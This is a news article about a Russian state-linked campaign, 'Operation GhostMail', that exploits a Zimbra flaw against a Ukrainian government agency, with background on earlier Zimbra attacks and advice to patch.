State-backed hackers linked to Russian military intelligence are targeting Ukrainian government entities by exploiting a critical vulnerability in Zimbra Collaboration Suite. This high-severity security flaw allowed unauthenticated attackers to gain remote code execution on the affected servers. Security researchers identified the flaw as CVE-2025-66376. The Cybersecurity and Infrastructure Security Agency added the vulnerability to its catalog of those exploited in the wild on Wednesday. Federal Civilian Executive Branch agencies received an order to secure their systems within two weeks under Binding Operational Directive 22-01.
Security researchers at Seqrite Labs reported the exploitation of the Zimbra vulnerability a day before the federal directive. They identified the campaign as Operation GhostMail targeting the Ukrainian State Hydrology Agency. This entity provides navigational and hydrographic support under the Ministry of Infrastructure. The phishing email contained no malicious attachments or suspicious links during the initial delivery phase.
The malicious messages delivered an obfuscated JavaScript payload that activates within the browser session. Researchers noted the script executes silently without user interaction once the email is opened. It begins harvesting credentials, session tokens, and backup two-factor authentication codes immediately. The attackers exfiltrated data from the victim mailbox going back 90 days via DNS and HTTPS.
Zimbra security flaws remain frequent targets for state-sponsored threat groups in the region. Previous incidents include the Winter Vivern cyberespionage group using a reflected XSS exploit in early 2023. That campaign breached thousands of vulnerable email servers to spy on NATO-aligned organizations. Government officials and military personnel communications were specifically monitored during that period.
Another warning emerged in late October 2024 from U.S. and U.K. cyber agencies regarding APT29 activities. These hackers linked to the Foreign Intelligence Service attacked vulnerable Zimbra servers at a mass scale. They exploited a different vulnerability to steal email account credentials from multiple targets. This pattern suggests a systemic risk across the email infrastructure used by diplomatic and government bodies.
Zimbra serves as a widely popular email and collaboration software suite globally. Hundreds of millions of people utilize the platform including hundreds of government agencies. Thousands of businesses also rely on the suite for internal communications and document management. The widespread adoption increases the potential surface area for exploitation by advanced persistent threats.
Industry analysis suggests malware is evolving to detect sandboxes and hide in plain sight. The Red Report 2026 reveals how new threats use math to bypass traditional security stacks. Organizations must evaluate if their current security measures can detect these sophisticated evasion techniques. Downloading sample analysis can help uncover the top 10 techniques used in modern campaigns.
The active exploitation of critical infrastructure highlights the urgency of rapid patching cycles. Security teams must prioritize the update to prevent unauthorized access to sensitive government data. Continued monitoring of the Zimbra ecosystem will remain essential for threat detection. Future campaigns may employ similar zero-day vulnerabilities to maintain operational security. This incident underscores the need for robust email security protocols across allied nations.
